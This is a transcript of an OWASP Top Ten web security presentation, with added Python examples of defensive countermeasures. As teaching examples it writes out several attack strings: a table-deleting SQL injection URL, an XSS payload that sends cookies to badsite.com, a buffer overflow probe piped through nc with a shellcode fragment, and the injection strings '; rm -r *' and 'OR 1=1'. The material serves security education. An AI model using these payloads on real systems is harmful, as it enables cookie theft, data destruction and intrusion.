
The Ten Most Critical Web Application Security Vulnerabilities



Presentation Transcript


  1. The Ten Most Critical Web Application Security Vulnerabilities
  Ryan J.W Chen

  2. Outline
  • OWASP Top Ten Vulnerabilities
    A1 Unvalidated Input
    A2 Broken Access Control
    A3 Broken Authentication and Session Management
    A4 Cross Site Scripting (XSS) Flaws
    A5 Buffer Overflows
    A6 Injection Flaws
    A7 Improper Error Handling
    A8 Insecure Storage
    A9 Denial of Service
    A10 Insecure Configuration Management

  3. Example Web Application (network diagram)
  Browser (Internet) → Web Server (DMZ) → Application Server (Protected Network) → Database Server (Internal Network)

  4. Top Ten Vulnerabilities this year & last year

  5. A1 Unvalidated Input (1/3)
  • An attacker can tamper with any part of an HTTP request, including the URL, query string, headers, cookies, form fields, and hidden fields.
  • Related attacks
    • A4 Cross Site Scripting
    • A5 Buffer Overflows
    • A6 Injection Flaws

  6. A1 Unvalidated Input (2/3)
  Any malicious user can see the query string and modify it!
  Example (SQL Injection):
    Original request: http://www.yoursite.com/phones/phonelist.cgi?phoneid=34
    Manipulation:     http://www.yoursite.com/phones/phonelist.cgi?phoneid=34;delete from phones
    What will be done? SELECT name, phone FROM phones WHERE phoneid=34; DELETE FROM phones

  7. A1 Unvalidated Input (3/3)
  • Countermeasures
  • Parameters should be validated before they are used, checking:
    • Data type
    • Allowed character set
    • Minimum and maximum length
    • Whether null is allowed
    • Whether the parameter is required or not
    • Whether duplicates are allowed
    • Numeric range
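The following is an added example (not code from the slides) that puts slides 6 and 7 together: a small validator implementing the seven checks listed above, applied to the `phoneid` parameter of the slide's `phonelist.cgi`, next to a rebuilt version of the vulnerable query. The in-memory SQLite table, the `Rule` class and `PHONE_RULES` are constructed for this example; `executescript()` is used in the vulnerable function only to stand in for a driver that runs stacked statements the way the slide describes.

```python
import re
import sqlite3
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    """One validation rule, one field per check on the slide."""
    kind: str = "str"                  # data type: "str" or "int"
    charset: str = r"[A-Za-z0-9_.-]*"  # allowed character set (regex, whole value must match)
    min_len: int = 1                   # minimum length
    max_len: int = 64                  # maximum length
    allow_null: bool = False           # whether an empty value is accepted
    required: bool = True              # whether the parameter must be present
    allow_dup: bool = False            # whether the parameter may be repeated
    min_val: Optional[int] = None      # numeric range (ints only)
    max_val: Optional[int] = None


def validate(rules, params):
    """params maps name -> list of raw values (the shape urllib.parse.parse_qs returns).
    Returns a dict of cleaned values or raises ValueError naming the first failed check."""
    unexpected = set(params) - set(rules)
    if unexpected:
        raise ValueError(f"unexpected parameter(s): {sorted(unexpected)}")
    clean = {}
    for name, rule in rules.items():
        values = params.get(name, [])
        if not values:
            if rule.required:
                raise ValueError(f"{name}: required parameter missing")
            continue
        if len(values) > 1 and not rule.allow_dup:
            raise ValueError(f"{name}: duplicates not allowed")
        raw = values[0]                # only the first value is used in this example
        if raw == "":
            if not rule.allow_null:
                raise ValueError(f"{name}: null not allowed")
            clean[name] = None
            continue
        if not rule.min_len <= len(raw) <= rule.max_len:
            raise ValueError(f"{name}: length out of range")
        if not re.fullmatch(rule.charset, raw):
            raise ValueError(f"{name}: illegal character")
        value = raw
        if rule.kind == "int":
            if not re.fullmatch(r"-?[0-9]+", raw):
                raise ValueError(f"{name}: not an integer")
            value = int(raw)
            if rule.min_val is not None and value < rule.min_val:
                raise ValueError(f"{name}: below minimum")
            if rule.max_val is not None and value > rule.max_val:
                raise ValueError(f"{name}: above maximum")
        clean[name] = value
    return clean


# Constructed in-memory table standing in for the slide's phones database.
def make_phone_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phones (phoneid INTEGER PRIMARY KEY, name TEXT, phone TEXT)")
    conn.executemany("INSERT INTO phones VALUES (?, ?, ?)",
                     [(34, "Alice", "555-0100"), (35, "Bob", "555-0101")])
    conn.commit()
    return conn


def phone_count(conn):
    return conn.execute("SELECT COUNT(*) FROM phones").fetchone()[0]


def phonelist_vulnerable(conn, raw_phoneid):
    """phonelist.cgi as the slide shows it: the raw query-string value is pasted into SQL.
    With '34;delete from phones' the DELETE runs as well."""
    sql = f"SELECT name, phone FROM phones WHERE phoneid={raw_phoneid}"
    conn.executescript(sql)            # stand-in for a driver that accepts stacked statements
    return sql


# Rule for phoneid: integer, digits only, at most 9 characters, at least 1.
PHONE_RULES = {"phoneid": Rule(kind="int", charset=r"[0-9]+", max_len=9, min_val=1)}


def phonelist_safe(conn, params):
    """Validate first, then bind the value instead of concatenating it into the SQL."""
    clean = validate(PHONE_RULES, params)
    return conn.execute("SELECT name, phone FROM phones WHERE phoneid=?",
                        (clean["phoneid"],)).fetchall()


def rejected(params):
    """True when validate() refuses the parameters under PHONE_RULES."""
    try:
        validate(PHONE_RULES, params)
        return False
    except ValueError:
        return True
```

Binding alone would already stop the stacked DELETE; validation is kept in front of it because the slide's checklist also catches out-of-range and duplicated values that a bound query would happily accept.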

  8. A2 Broken Access Control
  • Access Control = Authorization
  • Typical problems:
    • Forced browsing past access control checks
    • Path traversal
    • Insecure session IDs or keys
    • Client-side caching
    • File permissions – may allow access to config/password files
  • Countermeasures
    • Use an access control matrix to define access control rules.
    • Administrative functions can be protected with a VPN.
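As an added example (not from the slides) of the access control matrix countermeasure, the following maps (role, resource) to permitted actions and denies anything not listed, so that requesting an administrative URL directly (forced browsing) fails closed. The roles, resources, routes and the `session` dict are hypothetical; the role comes from the server-side session, never from anything the client sends.

```python
# Access control matrix: (role, resource) -> permitted actions.
# Anything absent is denied, so a forgotten entry fails closed rather than open.
ACL = {
    ("admin", "phones"): {"read", "create", "delete"},
    ("admin", "config"): {"read", "update"},
    ("user",  "phones"): {"read"},
}

# Hypothetical URL -> (resource, action) table; every route must be listed.
ROUTES = {
    "/phones/list":   ("phones", "read"),
    "/phones/delete": ("phones", "delete"),
    "/admin/config":  ("config", "update"),
}


def is_allowed(role, resource, action):
    """Default deny: only an explicit matrix entry grants the action."""
    return action in ACL.get((role, resource), set())


def handle(session, path):
    """Return the HTTP status an authorization layer would give the request.
    session is None when unauthenticated, else {'user': ..., 'role': ...} set at login."""
    if path not in ROUTES:
        return 404
    resource, action = ROUTES[path]
    if session is None:
        return 401                     # no forced browsing past the login step
    if not is_allowed(session["role"], resource, action):
        return 403
    return 200


def owner_check(session, record_owner):
    """Object-level rule on top of the matrix: a plain user only reaches their own record."""
    return session["role"] == "admin" or session["user"] == record_owner


def delete_phone_entry(session, record_owner):
    """Combined check for deleting one phone record; True means the delete may proceed."""
    return (handle(session, "/phones/delete") == 200
            and owner_check(session, record_owner))
```

The matrix is the single place a reviewer has to read to know who may do what; spreading `if role == "admin"` tests through the handlers is how entries get forgotten.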

  9. A3 Broken Authentication and Session Management
  • Weak authentication:
    • Password-only
    • Trust relationships between hosts
    • Unencrypted secrets could be sniffed
    • Easily guessable usernames
  • Countermeasures
    • Strong passwords
    • Account list protection
    • Session ID protection (SSL)
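An added example (not from the slides) of the session ID protection countermeasure: session IDs drawn from the OS random source, kept server-side under a hash so a leaked session table does not leak live IDs, expired after an idle timeout, and sent in a cookie marked `Secure` (SSL only) and `HttpOnly`. The `SessionStore` class, the timeout, the cookie name and the tiny password deny-list are all assumptions for this example; the `now` parameter exists only so expiry can be tested with a fake clock.

```python
import hashlib
import secrets
import time

SESSION_BYTES = 32          # 256 bits of randomness: not guessable, unlike a counter
SESSION_TTL = 15 * 60       # idle timeout in seconds (assumed value)
COOKIE_NAME = "SESSIONID"   # hypothetical cookie name


class SessionStore:
    def __init__(self, now=time.time):
        self._now = now
        self._sessions = {}  # sha256(session id) -> {"user": ..., "expires": ...}

    @staticmethod
    def _key(sid):
        # Store a hash of the id, so the table itself does not contain usable ids.
        return hashlib.sha256(sid.encode()).hexdigest()

    def create(self, user):
        sid = secrets.token_urlsafe(SESSION_BYTES)
        self._sessions[self._key(sid)] = {"user": user, "expires": self._now() + SESSION_TTL}
        return sid

    def lookup(self, sid):
        """Return the user for a live session, or None (unknown or expired)."""
        key = self._key(sid)
        entry = self._sessions.get(key)
        if entry is None:
            return None
        if entry["expires"] < self._now():
            del self._sessions[key]
            return None
        entry["expires"] = self._now() + SESSION_TTL   # sliding expiry on activity
        return entry["user"]

    def destroy(self, sid):
        """Logout: invalidate server-side, not just by clearing the cookie."""
        self._sessions.pop(self._key(sid), None)


def set_cookie_header(sid):
    # Secure: sent only over SSL/TLS, so it cannot be sniffed in clear text.
    # HttpOnly: not readable by page script, which blunts the cookie theft on the XSS slide.
    return f"Set-Cookie: {COOKIE_NAME}={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def guessable_session_id(counter):
    """The anti-pattern: a sequential id lets an attacker enumerate neighbours' sessions."""
    return str(counter)


# Constructed deny-list; a real deployment would use a large breached-password list.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein"}


def password_acceptable(password, min_len=12):
    """Minimal strong-password policy: length plus a deny-list of common choices."""
    return len(password) >= min_len and password.lower() not in COMMON_PASSWORDS
```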

  10. A4 Cross Site Scripting (XSS) Flaws
  • The attacker uses a trusted application/company to send malicious code to the end-user.
  Example ("cookie robbed!!"):
    <a href="http://www.insecuresite.com/welcome.asp?name=<FORM action=http://www.badsite.com/data.asp method=post id="idForm"><INPUT name="cookie" type="hidden"></FORM><SCRIPT>idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>">here</a>
  Source: Bo
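An added example (not from the slides) of the fix for the welcome page above: the `name` parameter is reflected into the page through an HTML encoder instead of raw, so the injected form and script arrive as inert text. `PAYLOAD` is the slide's own markup constructed as a string; the two `welcome_*` functions and the header set are hypothetical stand-ins for welcome.asp.

```python
import html

# The slide's injected value for the `name` parameter, as a constructed string.
PAYLOAD = ('<FORM action=http://www.badsite.com/data.asp method=post id="idForm">'
           '<INPUT name="cookie" type="hidden"></FORM>'
           '<SCRIPT>idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>')


def welcome_vulnerable(name):
    """welcome.asp as on the slide: the parameter is written into the page unchanged."""
    return f"<html><body>Welcome, {name}!</body></html>"


def welcome_safe(name):
    """Same page with HTML encoding: <, >, &, quotes become entities, so markup in
    `name` is displayed rather than executed. quote=True also makes the value safe
    inside a quoted attribute."""
    return f"<html><body>Welcome, {html.escape(name, quote=True)}!</body></html>"


def response_headers():
    """Defence in depth for the browser side (hypothetical policy values):
    a CSP that refuses inline script, plus no content sniffing."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; form-action 'self'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_active_markup(page):
    """Rough check used below: does the page still carry a live <script> or <form> tag?"""
    lowered = page.lower()
    return "<script" in lowered or "<form" in lowered
```

Encoding must happen at output time, in the context the value lands in (here HTML body or attribute); filtering the input for `<script>` on the way in is what the slide's multi-tag payload is built to slip past.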

  11. A5 Buffer Overflows
  • Mostly affects web/app servers
  • Goal: crash the target app and get a shell
  • Countermeasures
    • Keep up with bug reports
    • Periodically scan your website
    • Code reviews
  Example:
    • echo "vrfy `perl -e 'print "a" x 1000'`" | nc www.targetsystem.com 25
    • Replace this with something like this…
    • char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08…"

  12. A6 Injection Flaws
  • Allow an attacker to relay malicious code through a web application to another system.
  • Examples:
    • Path traversal: "../"
    • Add more commands: "; rm -r *"
    • SQL injection: "' OR 1=1"
  • Countermeasures
    • Avoid system calls (use libraries instead)
    • Validate input information.
    • Run with limited privileges
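An added example (not from the slides) of the first two countermeasures for the path-traversal and command-injection cases above: a user-supplied file name is resolved under a document root and rejected if it escapes, the file is then read with the language's own library call instead of shelling out, and where a program must be run its arguments are passed as a vector so "; rm -r *" stays one literal argument. The directory layout built by `build_demo_root()` is constructed for the example; SQL injection is covered by the example under slide 7.

```python
import os
import tempfile


def safe_path(base_dir, user_path):
    """Resolve user_path under base_dir and refuse anything that escapes it
    ("../", absolute paths, symlinks pointing outside). Returns the real path."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes document root")
    return target


def read_user_file(base_dir, user_path):
    """Library call in place of os.system('cat ' + user_path)."""
    with open(safe_path(base_dir, user_path), "r", encoding="utf-8") as f:
        return f.read()


def path_rejected(base_dir, user_path):
    """True when safe_path() refuses user_path."""
    try:
        safe_path(base_dir, user_path)
        return False
    except ValueError:
        return True


def shell_string_vulnerable(program, user_arg):
    """What an os.system()-style call hands to /bin/sh: the ';' starts a new command."""
    return f"{program} {user_arg}"


def argv_safe(program, user_arg):
    """Argument vector for subprocess.run(..., shell=False): the shell never parses
    user_arg, so ';', '*' and '$' are plain characters to the child program."""
    return [program, user_arg]


def build_demo_root():
    """Constructed layout: <root>/www/notes.txt is servable, <root>/secret.txt is not."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "www")
    os.mkdir(base)
    with open(os.path.join(base, "notes.txt"), "w", encoding="utf-8") as f:
        f.write("hello")
    with open(os.path.join(root, "secret.txt"), "w", encoding="utf-8") as f:
        f.write("top secret")
    return base
```

`realpath` is applied to both sides of the comparison on purpose: checking the string for "../" misses encoded variants and symlinks, whereas comparing the resolved locations does not.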

  13. A7 Improper Error Handling
  • Helps an attacker learn how to target the application.
  • Countermeasures
    • Code review
    • Modify default error pages (404, 401, etc.)
  Example: "File not found" vs. "Access denied"
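An added example (not from the slides) of the "File not found" vs. "Access denied" point: a request handler that gives the same generic response for a missing resource and a forbidden one, so the difference cannot be used to map which files exist, and that hides stack traces behind a reference number while the detail goes to the server log. The exception classes, the `serve()` wrapper and the lookup callable are hypothetical.

```python
import logging
import uuid

log = logging.getLogger("app")


class NotFound(Exception):
    pass


class AccessDenied(Exception):
    pass


def serve(lookup, path, user):
    """Run lookup(path, user) and turn its outcome into (status, body) for the client.
    Only the generic body leaves the server; specifics stay in the log."""
    try:
        return 200, lookup(path, user)
    except (NotFound, AccessDenied):
        # One status and one text for "does not exist" and "exists but forbidden".
        log.info("denied path=%s user=%s", path, user)
        return 404, "Not found"
    except Exception:
        ref = uuid.uuid4().hex[:8]
        log.exception("unhandled error ref=%s path=%s", ref, path)  # traceback to the log only
        return 500, f"Internal error (ref {ref})"


# Constructed resource table used by demo_lookup().
RESOURCES = {"/index.html": ("public", "welcome"), "/admin/config": ("admin", "secrets")}


def demo_lookup(path, user):
    if path not in RESOURCES:
        raise NotFound(path)
    level, content = RESOURCES[path]
    if level == "admin" and user != "root":
        raise AccessDenied(path)
    if path == "/boom":
        return 1 / 0
    return content


def crashing_lookup(path, user):
    """Simulates an unexpected bug in a handler."""
    return 1 / 0
```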

  14. A8 Insecure Storage
  • Insecure storage of sensitive information:
    • Poor choice of algorithm
    • Poor randomness
    • Insecure storage of keys, certificates, and passwords
    • Failure to encrypt critical data
    • Improper storage of secrets in memory
  • Countermeasures
    • Use a one-way hash function (SHA-1) instead of storing encrypted data.
    • Make sure there are no open vulnerabilities in the cryptography used.
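An added example (not from the slides) of the one-way-hash countermeasure for stored passwords. The slide names SHA-1; the example uses a salted, iterated construction (PBKDF2-HMAC-SHA256 from the standard library) because a plain unsalted hash gives every user with the same password the same stored value and is cheap to brute-force, and it shows the unsalted form beside it for contrast. The storage string format, the iteration count and the `verify_password` helper are assumptions for this example.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 100_000   # assumed work factor; raise it as far as login latency allows
SALT_BYTES = 16


def hash_password(password):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' for storage.
    A fresh random salt per user means equal passwords give different records."""
    salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored, candidate):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def unsalted_sha1(password):
    """The weak form: deterministic and fast, so a precomputed table cracks it."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()
```

Storing a hash rather than ciphertext also removes the key-management problem the slide lists under "insecure storage of keys": there is no key to protect, because nothing needs to be decrypted.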

  15. A9 Denial of Service
  • Legitimate users can't be serviced:
    • Exhaust the system resources
    • Legitimate account lockout
  • Countermeasures
    • Limit the resources allocated to any user to a bare minimum.
    • Avoid any unnecessary access to databases or other expensive resources.
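An added example (not from the slides) of limiting what any one user may consume: a per-source token-bucket limiter that admits a short burst and then only a steady rate, placed in front of an expensive operation such as a database query. The rate and burst values and the `protected_query` wrapper are assumptions; the `now` parameter lets the test drive a fake clock.

```python
import time


class RateLimiter:
    """Token bucket per source (client address, user id, ...): each source may use
    `burst` requests at once, then `rate` requests per second on average."""

    def __init__(self, rate, burst, now=time.monotonic):
        self.rate = float(rate)
        self.burst = float(burst)
        self._now = now
        self._buckets = {}   # source -> (tokens, last timestamp)

    def allow(self, source):
        now = self._now()
        tokens, last = self._buckets.get(source, (self.burst, now))
        tokens = min(self.burst, tokens + (now - last) * self.rate)  # refill since last call
        if tokens >= 1.0:
            self._buckets[source] = (tokens - 1.0, now)
            return True
        self._buckets[source] = (tokens, now)
        return False


# Constructed stand-in for the slide's "expensive resource".
QUERY_COST = {"count": 0}


def expensive_query(phoneid):
    QUERY_COST["count"] += 1
    return f"row {phoneid}"


def protected_query(limiter, source, phoneid):
    """Check the budget before touching the database, not after."""
    if not limiter.allow(source):
        return 429, "Too many requests"
    return 200, expensive_query(phoneid)
```

Keying the bucket by source rather than by account is also why this does not become the "legitimate account lockout" the slide lists: a flood aimed at one victim's username throttles the flooding source, not the victim.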

  16. A10 Insecure Configuration Management
  • Developers ≠ web masters
  • Configuration problems:
    • Unpatched security flaws in the server software.
    • Improper file and directory permissions.
    • Default accounts with their default passwords.
  • Countermeasures
    • Configure all security mechanisms.
    • Turn off all unused services.
    • Set up and audit roles, permissions, and accounts.
    • Logging and alerts.
